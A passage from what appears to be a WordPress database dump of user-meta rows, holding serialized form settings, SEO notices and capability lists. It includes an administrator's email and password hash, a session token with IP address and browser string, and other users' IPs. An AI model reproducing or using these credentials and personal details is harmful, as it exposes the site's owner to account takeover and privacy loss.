Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";}}}s:7:\"actions\";a:3:{s:5:\"tmp-1\";a:1:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"label\";s:15:\"Success Message\";s:4:\"type\";s:14:\"successmessage\";s:7:\"message\";s:42:\"Your form has been successfully submitted.\";s:5:\"order\";i:1;s:6:\"active\";b:1;s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}}s:5:\"tmp-2\";a:1:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"label\";s:11:\"Admin Email\";s:4:\"type\";s:5:\"email\";s:5:\"order\";i:2;s:6:\"active\";b:1;s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";}}s:5:\"tmp-3\";a:1:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"label\";s:16:\"Store Submission\";s:4:\"type\";s:4:\"save\";s:5:\"order\";i:3;s:6:\"active\";b:1;s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";}}}}'),(355,6,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(356,6,'community-events-location','a:1:{s:2:\"ip\";s:12:\"173.69.150.0\";}'),(362,1,'wpseo-dismiss-configuration-notice','yes'),(368,1,'dismissed_template_files_notice','1'),(371,1,'wc_last_active','1534118400'),(372,1,'_itsec_has_logged_in','1534082891'),(374,1,'itsec_logs_page_screen_options','a:6:{s:8:\"per_page\";i:20;s:12:\"default_view\";s:9:\"important\";s:5:\"color\";b:1;s:10:\"show_debug\";b:0;s:12:\"show_process\";b:0;s:9:\"last_seen\";i:0;}'),(375,1,'lwz_wpseo-dismiss-gsc','seen'),(380,1,'closedpostboxes_event','a:1:{i:0;s:10:\"postcustom\";}'),(381,1,'metaboxhidden_event','a:1:{i:0;s:7:\"slugdiv\";}'),(393,8,'syntax_highlighting','true'),(394,8,'comment_shortcuts','false'),(395,8,'admin_color','fresh'),(396,8,'use_ssl','0'),(397,8,'show_admin_bar_front','true'),(398,8,'locale',''),(399,8,'lwz_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(400,8,'lwz_user_level','10'),(401,8,'dismissed_wp_pointers','wp496_privacy'),(402,8,'_yoast_wpseo_profile_updated','1537970613'),(404,1,'show_try_gutenberg_panel','0'),(430,8,'session_tokens','a:1:{s:64:\"6691c528f1c77bc1e76f7bee40502963433f8cd798fc370ad21b3610f7731f0a\";a:4:{s:10:\"expiration\";i:1542476956;s:2:\"ip\";s:11:\"2.50.92.249\";s:2:\"ua\";s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\";s:5:\"login\";i:1541267356;}}'),(406,8,'_itsec_has_logged_in','1537970141'),(407,8,'gform_recent_forms','a:4:{i:0;s:2:\"10\";i:1;s:1:\"8\";i:2;s:1:\"7\";i:3;s:1:\"6\";}'),(408,8,'icwp-wpsf-meta','a:2:{s:6:\"prefix\";s:9:\"icwp-wpsf\";s:7:\"user_id\";i:8;}'),(409,8,'icwp-flag-can-store-user-meta','icwp'),(410,8,'itsec_user_activity_last_seen','1541265044'),(421,8,'itsec-password-strength','4'),(412,8,'wpseo_title',''),(413,8,'wpseo_metadesc',''),(414,8,'wpseo_noindex_author',''),(415,8,'wpseo_content_analysis_disable',''),(416,8,'wpseo_keyword_analysis_disable',''),(417,8,'googleplus',''),(418,8,'twitter',''),(419,8,'facebook',''),(420,8,'itsec_last_password_change','1537970378'),(423,8,'lwz_dashboard_quick_press_last_post_id','1337'),(424,8,'community-events-location','a:1:{s:2:\"ip\";s:9:\"2.50.92.0\";}'),(425,8,'lwz_user-settings','libraryContent=browse&editor=tinymce'),(426,8,'lwz_user-settings-time','1541265944'),(465,1,'lwz_yoast_notifications','a:2:{i:0;a:2:{s:7:\"message\";s:372:\"<strong>New in Yoast SEO 14.9: </strong>We now have Hebrew keyphrase recognition and some great performance improvements! <a href=\"https://yoa.st/yoast14-9?php_version=7.3&#038;platform=wordpress&#038;platform_version=5.5.1&#038;software=free&#038;software_version=14.9&#038;days_active=30plus&#038;user_language=en_US\" target=\"_blank\">Read all about version 14.9 here</a>\";s:7:\"options\";a:10:{s:4:\"type\";s:7:\"updated\";s:2:\"id\";s:20:\"wpseo-plugin-updated\";s:4:\"user\";O:7:\"WP_User\":8:{s:4:\"data\";O:8:\"stdClass\":10:{s:2:\"ID\";s:1:\"1\";s:10:\"user_login\";s:15:\"pr@zphiblgz.org\";s:9:\"user_pass\";s:34:\"$P$B24Ukj6o3r48k.W/YnqTRZdlzCX5Dq.\";s:13:\"user_nicename\";s:14:\"przphiblgz-org\";s:10:\"user_email\";s:15:\"pr@zphiblgz.org\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2016-11-29 16:28:18\";s:19:\"user_activation_key\";s:0:\"\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:15:\"pr@zphiblgz.org\";}s:2:\"ID\";i:1;s:4:\"caps\";a:1:{s:13:\"administrator\";b:1;}s:7:\"cap_key\";s:16:\"lwz_capabilities\";s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:7:\"allcaps\";a:274:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:17:\"cuar_view_account\";b:1;s:17:\"cuar_edit_account\";b:1;s:16:\"cuar_pp_list_all\";b:1;s:12:\"cuar_pp_edit\";b:1;s:14:\"cuar_pp_delete\";b:1;s:12:\"cuar_pp_read\";b:1;s:25:\"cuar_pp_manage_categories\";b:1;s:23:\"cuar_pp_edit_categories\";b:1;s:25:\"cuar_pp_delete_categories\";b:1;s:25:\"cuar_pp_assign_categories\";b:1;s:15:\"cuar_view_pages\";b:1;s:31:\"cuar_view_any_cuar_private_page\";b:1;s:26:\"cuar_pf_manage_attachments\";b:1;s:16:\"cuar_pf_list_all\";b:1;s:12:\"cuar_pf_edit\";b:1;s:14:\"cuar_pf_delete\";b:1;s:12:\"cuar_pf_read\";b:1;s:25:\"cuar_pf_manage_categories\";b:1;s:23:\"cuar_pf_edit_categories\";b:1;s:25:\"cuar_pf_delete_categories\";b:1;s:25:\"cuar_pf_assign_categories\";b:1;s:15:\"cuar_view_files\";b:1;s:31:\"cuar_view_any_cuar_private_file\";b:1;s:23:\"cuar_access_admin_panel\";b:1;s:23:\"view-customer-area-menu\";b:1;s:17:\"cuar_view_top_bar\";b:1;s:17:\"manage_events_cap\";b:1;s:23:\"manage_ticket_types_cap\";b:1;s:25:\"manage_discount_codes_cap\";b:1;s:17:\"manage_orders_cap\";b:1;s:20:\"manage_attendees_cap\";b:1;s:27:\"manage_ticket_templates_cap\";b:1;s:19:\"delete_checkins_cap\";b:1;s:20:\"delete_attendees_cap\";b:1;s:19:\"manage_settings_cap\";b:1;s:15:\"save_ticket_cap\";b:1;s:16:\"add_discount_cap\";b:1;s:17:\"publish_tc_events\";b:1;s:14:\"edit_tc_events\";b:1;s:21:\"edit_others_tc_events\";b:1;s:16:\"delete_tc_events\";b:1;s:23:\"delete_others_tc_events\";b:1;s:22:\"read_private_tc_events\";b:1;s:13:\"edit_tc_event\";b:1;s:15:\"delete_tc_event\";b:1;s:13:\"read_tc_event\";b:1;s:24:\"edit_published_tc_events\";b:1;s:22:\"edit_private_tc_events\";b:1;s:24:\"delete_private_tc_events\";b:1;s:26:\"delete_published_tc_events\";b:1;s:16:\"create_tc_events\";b:1;s:18:\"publish_tc_tickets\";b:1;s:15:\"edit_tc_tickets\";b:1;s:14:\"edit_tc_ticket\";b:1;s:22:\"edit_others_tc_tickets\";b:1;s:17:\"delete_tc_tickets\";b:1;s:24:\"delete_others_tc_tickets\";b:1;s:23:\"read_private_tc_tickets\";b:1;s:16:\"delete_tc_ticket\";b:1;s:14:\"read_tc_ticket\";b:1;s:25:\"edit_published_tc_tickets\";b:1;s:23:\"edit_private_tc_tickets\";b:1;s:25:\"delete_private_tc_tickets\";b:1;s:27:\"delete_published_tc_tickets\";b:1;s:17:\"create_tc_tickets\";b:1;s:24:\"edit_tc_tickets_instance\";b:1;s:24:\"read_tc_tickets_instance\";b:1;s:26:\"delete_tc_tickets_instance\";b:1;s:27:\"create_tc_tickets_instances\";b:1;s:25:\"edit_tc_tickets_instances\";b:1;s:38:\"edit_others_posts_tc_tickets_instances\";b:1;s:28:\"publish_tc_tickets_instances\";b:1;s:33:\"read_private_tc_tickets_instances\";b:1;s:27:\"delete_tc_tickets_instances\";b:1;s:35:\"delete_private_tc_tickets_instances\";b:1;s:37:\"delete_published_tc_tickets_instances\";b:1;s:34:\"delete_others_tc_tickets_instances\";b:1;s:33:\"edit_private_tc_tickets_instances\";b:1;s:35:\"edit_published_tc_tickets_instances\";b:1;s:13:\"edit_tc_order\";b:1;s:13:\"read_tc_order\";b:1;s:15:\"delete_tc_order\";b:1;s:16:\"create_tc_orders\";b:1;s:14:\"edit_tc_orders\";b:1;s:27:\"edit_others_posts_tc_orders\";b:1;s:17:\"publish_tc_orders\";b:1;s:22:\"read_private_tc_orders\";b:1;s:16:\"delete_tc_orders\";b:1;s:24:\"delete_private_tc_orders\";b:1;s:26:\"delete_published_tc_orders\";b:1;s:23:\"delete_others_tc_orders\";b:1;s:22:\"edit_private_tc_orders\";b:1;s:24:\"edit_published_tc_orders\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;s:6:\"sp_cdm\";b:1;s:14:\"sp_cdm_vendors\";b:1;s:15:\"sp_cdm_settings\";b:1;s:15:\"sp_cdm_projects\";b:1;s:15:\"sp_cdm_uploader\";b:1;s:16:\"sp_cdm_user_logs\";b:1;s:11:\"sp_cdm_help\";b:1;s:12:\"sp_cdm_forms\";b:1;s:13:\"sp_cdm_groups\";b:1;s:17:\"sp_cdm_categories\";b:1;s:15:\"sp_cdm_top_menu\";b:1;s:26:\"sp_cdm_show_folders_as_nav\";b:1;s:14:\"ure_edit_roles\";b:1;s:16:\"ure_create_roles\";b:1;s:16:\"ure_delete_roles\";b:1;s:23:\"ure_create_capabilities\";b:1;s:23:\"ure_delete_capabilities\";b:1;s:18:\"ure_manage_options\";b:1;s:15:\"ure_reset_roles\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:16:\"manage_downloads\";b:1;s:21:\"access_server_browser\";b:1;s:10:\"delete_ads\";b:1;s:17:\"delete_others_ads\";b:1;s:20:\"delete_published_ads\";b:1;s:8:\"edit_ads\";b:1;s:15:\"edit_others_ads\";b:1;s:16:\"edit_private_ads\";b:1;s:18:\"edit_published_ads\";b:1;s:11:\"publish_ads\";b:1;s:16:\"read_private_ads\";b:1;s:19:\"delete_applications\";b:1;s:26:\"delete_others_applications\";b:1;s:29:\"delete_published_applications\";b:1;s:17:\"edit_applications\";b:1;s:24:\"edit_others_applications\";b:1;s:25:\"edit_private_applications\";b:1;s:27:\"edit_published_applications\";b:1;s:20:\"publish_applications\";b:1;s:19:\"create_applications\";b:1;s:25:\"read_private_applications\";b:1;s:20:\"wpseo_manage_options\";b:1;s:11:\"hustle_menu\";b:1;s:18:\"hustle_edit_module\";b:1;s:13:\"hustle_create\";b:1;s:24:\"hustle_edit_integrations\";b:1;s:20:\"hustle_access_emails\";b:1;s:20:\"hustle_edit_settings\";b:1;s:16:\"hustle_analytics\";b:1;s:13:\"administrator\";b:1;}s:6:\"filter\";N;s:16:\"\0WP_User\0site_id\";i:1;}s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:1:{s:13:\"dismiss_value\";s:4:\"14.9\";}s:13:\"dismissal_key\";s:20:\"wpseo-plugin-updated\";s:12:\"capabilities\";a:1:{i:0;s:20:\"wpseo_manage_options\";}s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}i:1;a:2:{s:7:\"message\";O:61:\"Yoast\\WP\\SEO\\Presenters\\Admin\\Indexing_Notification_Presenter\":3:{s:18:\"\0*\0total_unindexed\";i:437;s:9:\"\0*\0reason\";s:26:\"permalink_settings_changed\";s:20:\"\0*\0short_link_helper\";O:38:\"Yoast\\WP\\SEO\\Helpers\\Short_Link_Helper\":2:{s:17:\"\0*\0options_helper\";O:35:\"Yoast\\WP\\SEO\\Helpers\\Options_Helper\":0:{}s:17:\"\0*\0product_helper\";O:35:\"Yoast\\WP\\SEO\\Helpers\\Product_Helper\":0:{}}}s:7:\"options\";a:10:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:13:\"wpseo-reindex\";s:4:\"user\";O:7:\"WP_User\":8:{s:4:\"data\";O:8:\"stdClass\":10:{s:2:\"ID\";s:1:\"1\";s:10:\"user_login\";s:15:\"pr@zphiblgz.org\";s:9:\"user_pass\";s:34:\"$P$B24Ukj6o3r48k.W/YnqTRZdlzCX5Dq.\";s:13:\"user_nicename\";s:14:\"przphiblgz-org\";s:10:\"user_email\";s:15:\"pr@zphiblgz.org\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2016-11-29 16:28:18\";s:19:\"user_activation_key\";s:0:\"\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:15:\"pr@zphiblgz.org\";}s:2:\"ID\";i:1;s:4:\"caps\";a:1:{s:13:\"administrator\";b:1;}s:7:\"cap_key\";s:16:\"lwz_capabilities\";s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:7:\"allcaps\";a:274:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:17:\"cuar_view_account\";b:1;s:17:\"cuar_edit_account\";b:1;s:16:\"cuar_pp_list_all\";b:1;s:12:\"cuar_pp_edit\";b:1;s:14:\"cuar_pp_delete\";b:1;s:12:\"cuar_pp_read\";b:1;s:25:\"cuar_pp_manage_categories\";b:1;s:23:\"cuar_pp_edit_categories\";b:1;s:25:\"cuar_pp_delete_categories\";b:1;s:25:\"cuar_pp_assign_categories\";b:1;s:15:\"cuar_view_pages\";b:1;s:31:\"cuar_view_any_cuar_private_page\";b:1;s:26:\"cuar_pf_manage_attachments\";b:1;s:16:\"cuar_pf_list_all\";b:1;s:12:\"cuar_pf_edit\";b:1;s:14:\"cuar_pf_delete\";b:1;s:12:\"cuar_pf_read\";b:1;s:25:\"cuar_pf_manage_categories\";b:1;s:23:\"cuar_pf_edit_categories\";b:1;s:25:\"cuar_pf_delete_categories\";b:1;s:25:\"cuar_pf_assign_categories\";b:1;s:15:\"cuar_view_files\";b:1;s:31:\"cuar_view_any_cuar_private_file\";b:1;s:23:\"cuar_access_admin_panel\";b:1;s:23:\"view-customer-area-menu\";b:1;s:17:\"cuar_view_top_bar\";b:1;s:17:\"manage_events_cap\";b:1;s:23:\"manage_ticket_types_cap\";b:1;s:25:\"manage_discount_codes_cap\";b:1;s:17:\"manage_orders_cap\";b:1;s:20:\"manage_attendees_cap\";b:1;s:27:\"manage_ticket_templates_cap\";b:1;s:19:\"delete_checkins_cap\";b:1;s:20:\"delete_attendees_cap\";b:1;s:19:\"manage_settings_cap\";b:1;s:15:\"save_ticket_cap\";b:1;s:16:\"add_discount_cap\";b:1;s:17:\"publish_tc_events\";b:1;s:14:\"edit_tc_events\";b:1;s:21:\"edit_others_tc_events\";b:1;s:16:\"delete_tc_events\";b:1;s:23:\"delete_others_tc_events\";b:1;s:22:\"read_private_tc_events\";b:1;s:13:\"edit_tc_event\";b:1;s:15:\"delete_tc_event\";b:1;s:13:\"read_tc_event\";b:1;s:24:\"edit_published_tc_events\";b:1;s:22:\"edit_private_tc_events\";b:1;s:24:\"delete_private_tc_events\";b:1;s:26:\"delete_published_tc_events\";b:1;s:16:\"create_tc_events\";b:1;s:18:\"publish_tc_tickets\";b:1;s:15:\"edit_tc_tickets\";b:1;s:14:\"edit_tc_ticket\";b:1;s:22:\"edit_others_tc_tickets\";b:1;s:17:\"delete_tc_tickets\";b:1;s:24:\"delete_others_tc_tickets\";b:1;s:23:\"read_private_tc_tickets\";b:1;s:16:\"delete_tc_ticket\";b:1;s:14:\"read_tc_ticket\";b:1;s:25:\"edit_published_tc_tickets\";b:1;s:23:\"edit_private_tc_tickets\";b:1;s:25:\"delete_private_tc_tickets\";b:1;s:27:\"delete_published_tc_tickets\";b:1;s:17:\"create_tc_tickets\";b:1;s:2